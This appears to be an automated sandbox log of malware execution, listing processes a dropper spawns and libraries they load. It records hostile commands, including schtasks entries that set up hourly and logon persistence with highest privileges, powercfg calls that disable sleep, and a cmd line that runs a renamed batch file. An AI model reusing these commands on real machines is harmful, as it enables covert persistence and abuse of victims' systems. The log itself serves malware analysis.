Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe "C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKKJEBFID.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJKFCGHID.exe"
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process created: unknown unknown
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: propsys.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: edputil.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: slc.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: sppc.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: onecorecommonproxystub.dll
